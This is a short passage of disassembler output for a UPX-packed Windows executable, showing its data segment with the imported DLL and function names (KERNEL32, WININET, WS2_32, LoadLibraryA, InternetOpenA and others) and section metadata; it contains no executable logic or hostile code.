; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
UPX2 segment para public 'DATA' use32
assume cs:UPX2
;org 408000h
dd 3 dup(0)
dd 80C4h, 808Ch, 3 dup(0)
dd 80D1h, 809Ch, 3 dup(0)
dd 80DEh, 80A4h, 3 dup(0)
dd 80E9h, 80ACh, 3 dup(0)
dd 80F4h, 80B4h, 3 dup(0)
dd 8100h, 80BCh, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
aQW db 'ÓqÃw',0
align 4
aNia db '¨A~',0
align 4
aBB db '¡ÈÂB',0
align 4
aKblq db 'ŠB«q',0
align 4
aKernel32_dll db 'KERNEL32.DLL',0
aAdvapi32_dll db 'ADVAPI32.dll',0
aMsvcrt_dll db 'MSVCRT.dll',0
aUser32_dll db 'USER32.dll',0
aWininet_dll db 'WININET.dll',0
aWs2_32_dll db 'WS2_32.dll',0
align 4
aLoadlibrarya db 'LoadLibraryA',0
align 2
aGetprocaddress db 'GetProcAddress',0
align 2
aExitprocess db 'ExitProcess',0
align 4
aRegclosekey db 'RegCloseKey',0
dd 61720000h, 646Eh, 72707377h, 66746E69h, 41h, 65746E49h
dd 74656E72h, 6E65704Fh, 41h, 3A6h dup(0)
UPX2 ends
; Section 4. (virtual address 00009000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00009000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 409000h
align 2000h
_idata2 ends
end start